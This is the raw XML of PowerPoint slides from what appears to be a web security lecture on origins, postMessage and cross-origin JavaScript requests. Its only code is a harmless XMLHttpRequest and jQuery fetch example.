                <a:sym typeface="Helvetica Neue Light" panose="02000403000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Site A</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="1800">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
                <a:sym typeface="Helvetica Neue Light" panose="02000403000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> context</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
              <a:sym typeface="Helvetica Neue Light" panose="02000403000000020004" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37900" name="Line 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C3F9953-B776-714B-B7AF-14F7DF45D11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307605" y="2871699"/>
            <a:ext cx="1096963" cy="871538"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="969696"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="triangle" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="82296" tIns="41148" rIns="82296" bIns="41148"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="92173" name="Picture 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE14CD24-B688-564D-8556-5C43CD79F2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8042" y="3763874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174" name="Rectangle 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B67ADDC-B9CA-7342-938E-168EFE28C8F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10028329" y="4640582"/>
            <a:ext cx="130805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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="1800">
                <a:latin typeface="+mn-lt"/>
                <a:sym typeface="Helvetica Neue Light" panose="02000403000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Site </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="1800">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
                <a:sym typeface="Helvetica Neue Light" panose="02000403000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>B context</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
              <a:sym typeface="Helvetica Neue Light" panose="02000403000000020004" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37903" name="Line 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFBB43B3-748C-914A-B01D-8CD372929AAE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9513979" y="2871699"/>
            <a:ext cx="1028700" cy="871538"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="969696"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="triangle" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="82296" tIns="41148" rIns="82296" bIns="41148"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37904" name="Line 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD251CDB-3B21-484F-8BF4-8BDCB2ABDF0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0747467" y="2871700"/>
            <a:ext cx="0" cy="823913"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="969696"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="triangle" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="82296" tIns="41148" rIns="82296" bIns="41148"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37905" name="Line 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFD3273A-CB76-EA45-8A5F-B78212B8D5B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032967" y="2871700"/>
            <a:ext cx="0" cy="823913"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="969696"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="triangle" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="82296" tIns="41148" rIns="82296" bIns="41148"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167955" name="Line 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13287838-F298-2B4F-B20E-63FC7952B3CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="9582243" y="4106774"/>
            <a:ext cx="547687" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="50800">
            <a:solidFill>
              <a:srgbClr val="65AFFB"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="stealth" w="med" len="med"/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="25399" dir="5400000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="bg2">
                <a:alpha val="50000"/>
              </a:schemeClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="82296" tIns="41148" rIns="82296" bIns="41148"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167956" name="Line 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBCD1390-0F40-C14D-A1AD-76694FA54177}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1" flipV="1">
            <a:off x="9582243" y="4381412"/>
            <a:ext cx="547687" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="50800">
            <a:solidFill>
              <a:srgbClr val="65AFFB"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="stealth" w="med" len="med"/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="25399" dir="5400000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="bg2">
                <a:alpha val="50000"/>
              </a:schemeClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="82296" tIns="41148" rIns="82296" bIns="41148"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155480"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition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69" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9BB5DD7-E395-634E-923D-294B97564AF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postMessage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83970" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#13;&#10;Second level&#13;&#10;Third level&#13;&#10;Fourth level&#13;&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F335840-5A5B-D348-88F6-4911FCA6AEB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066800" y="2103120"/>
            <a:ext cx="4204447" cy="3849624"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>New API for inter-frame communication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
              <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
              </a:rPr>
              <a:t>Supported in latest browsers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
              <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="83972" name="Picture 13" descr="yourprezi-page-005.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E66B4BC6-1EDA-B84D-8CB6-5F24E3A1A6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27" t="32941" r="18182" b="18823"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5782235" y="1940547"/>
            <a:ext cx="5518167" cy="29769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44032E3-8C24-B644-B1F7-FCFC41BA77B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325880" y="5730240"/>
            <a:ext cx="76242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Many security issues related to origin checks on messages</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2084607188"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition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1" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{712827DE-6171-6444-8FD0-551D2290226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ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
                <a:sym typeface="Helvetica Neue Light" panose="02000403000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>JS Can Make Network Requests</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              <a:sym typeface="Helvetica Neue Light" panose="02000403000000020004" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92163" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EB2AB7B-094D-1B45-8932-7C5E277CFB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73276" y="2079626"/>
            <a:ext cx="8069263" cy="402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4290" tIns="34290" rIns="34290" bIns="34290" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="342900" indent="-342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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296863" indent="-296863">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buChar char="•"/>
              <a:defRPr kumimoji="1"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•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lvl="1">
              <a:spcBef>
                <a:spcPts val="1713"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzPct val="46000"/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="ko-KR">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
              <a:sym typeface="Helvetica Neue Light" panose="02000403000000020004" pitchFamily="2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31C8E4C-E706-F14C-A3E3-65344797BB83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="1814201"/>
            <a:ext cx="8178800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284163"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3A34FF"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>let </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3A34FF"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>xhr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3A34FF"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3A34FF"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3A34FF"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="284163"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3A34FF"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>xhr.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3A34FF"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>('GET', “/article/example”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="284163"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3A34FF"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>xhr.send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3A34FF"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="284163"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3A34FF"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>xhr.onload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3A34FF"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> = function() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="284163"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3A34FF"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3A34FF"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>xhr.status</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3A34FF"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> == 200) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="284163"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3A34FF"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    alert(`Done, got ${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3A34FF"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>xhr.response.length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3A34FF"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>} bytes`);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="284163"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3A34FF"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="284163"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3A34FF"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>};</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="284163"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3A34FF"/>
              </a:solidFill>
              <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="284163"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>// ...or... with jQuery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="284163"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>$.ajax({</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>: “/article/example“, success: function(result){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="284163"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    $("#div1").html(result);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="284163"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>}});</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3925236066"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition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2" name="Rectangle 71">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F04BED5A-E98E-4DA0-BAA5-4F6AB2492D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EB64B94A-E40E-48CE-BD7B-C1A30AE572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3982" y="488542"/>
            <a:ext cx="11244036" cy="5880916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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49EC5CA6-6479-49D5-B4B5-5643D26B83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84442" y="2057401"/>
            <a:ext cx="0" cy="27432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 77">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1B26337-5AA4-470D-9687-5907CB53B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685800"/>
            <a:ext cx="10853928" cy="5486400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="6350" cap="sq" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92161" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{712827DE-6171-6444-8FD0-551D2290226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66440" y="1000370"/>
            <a:ext cx="3462079" cy="4857262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
                <a:sym typeface="Helvetica Neue Light" panose="02000403000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Cross-Origin JS Requests</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="4400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              <a:sym typeface="Helvetica Neue Light" panose="02000403000000020004" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78A56533-7C42-CE44-AF2B-83894B2552B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963691" y="1000370"/>
            <a:ext cx="6212310" cy="4857262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
